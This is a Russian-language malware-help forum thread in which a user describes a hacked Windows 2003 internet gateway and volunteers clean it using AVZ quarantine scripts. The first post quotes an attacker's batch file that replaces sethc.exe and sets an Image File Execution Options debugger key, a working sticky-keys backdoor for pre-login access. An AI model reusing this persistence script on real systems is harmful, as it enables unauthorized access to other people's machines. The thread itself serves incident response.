Показано с 1 по 12 из 12.

мой серевр инета взломали (заявка № 52443)

  1. #1
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    6
    Вес репутации
    31

    Question мой серевр инета взломали

    у меня по ходу мой серевр инета взломали, который раздает инет на пару десятков компов
    Windows 2003, UserGate 2.8, RAdmin 2.1.
    щас проверяю антивирусом cureit
    нашло заразу у нового пользователя windows first(я его не создавал)

    в каталоге пользователя first лежит батник 1.bat и файл 222.exe
    текст батника:
    copy 222.exe %systemroot%\system32\dllcache\sethc.exe & copy 222.exe %systemroot%\system32\sethc.exe & copy 222.exe %systemroot%\Cluster\222.exe
    echo Windows Registry Editor Version 5.00 >1.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] >>1.reg
    echo "debugger"="c:\\windows\\Cluster\\222.exe" >>1.reg

    regedit /s 1.reg
    del 1.reg

    а также в каталоге пользователя C:\Documents and Settings\First\
    rad.exe (Program.RemoteAdmin Контейнер содержит инфицированные объекты) - cureit его переместил

    Посмотрите лог. Что там желательно сделать чтобы улучшить безопасность?
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,108
    Вес репутации
    3001
    Мы будем Вам очень признательны, если Вы прочтёте и в точности выполните наши несложные правила.
    В противном случае мы никак не сможем быть Вам полезны.

  4. #3
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    6
    Вес репутации
    31
    я прочел
    HiJackThis ничего не нашел, так как на этом компе в инет через браузер не выхожу
    sysecure.htm как две капли похож на ssyscheck.htm

  5. #4
    Expert Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.03.2008
    Сообщений
    14,832
    Вес репутации
    1786
    Сказали в морг, значит в морг делайте как положено....

  6. #5
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    6
    Вес репутации
    31
    просто не охота перезагружать комп после проверки авз-ом еще раз
    работают люди

  7. #6
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,108
    Вес репутации
    3001
    Цитата Сообщение от wisen Посмотреть сообщение
    просто не охота перезагружать комп после проверки авз-ом еще раз
    В процессе лечения обязательно придется перегружаться, причем неоднократно.
    Найдите возможность, выполнить правила, если хотите, чтобы Вам помогли вылечить систему.

  8. #7
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    6
    Вес репутации
    31
    Сделал все логи.
    Вложения Вложения

  9. #8
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    96,524
    Вес репутации
    3021
    Выполните скрипт в AVZ
    Код:
    begin
    QuarantineFile('C:\WINDOWS\system32\umxw.dll','');
     QuarantineFile('C:\WINDOWS\system32\umxtrw.dll','');
     QuarantineFile('C:\WINDOWS\system32\umxexw.dll','');
    end.
    Пришлите карантин согласно Приложения 3 правил по красной ссылке Прислать запрошенный карантин вверху темы
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  10. #9
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    6
    Вес репутации
    31
    скрипт сделал
    Последний раз редактировалось Rene-gad; 20.08.2009 в 11:02. Причина: quarantine removed

  11. #10
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,108
    Вес репутации
    3001
    Цитата Сообщение от wisen Посмотреть сообщение
    скрипт сделал
    Карантин загрузите как написано в сообщении thyrex и никак иначе.

  12. #11
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    6
    Вес репутации
    31
    какантин загрузил

  13. #12
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 3
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) wisen, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. нет инета
      От trew911 в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 25.02.2011, 22:16
    2. Выкидывает из инета
      От denis021 в разделе Помогите!
      Ответов: 8
      Последнее сообщение: 05.11.2010, 22:09
    3. Винда с инета
      От sorrento в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 15.06.2008, 14:24
    4. Трафики инета
      От kires в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 07.12.2007, 20:22
    5. неи инета
      От kaban77 в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 22.02.2007, 09:29

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00016 seconds with 17 queries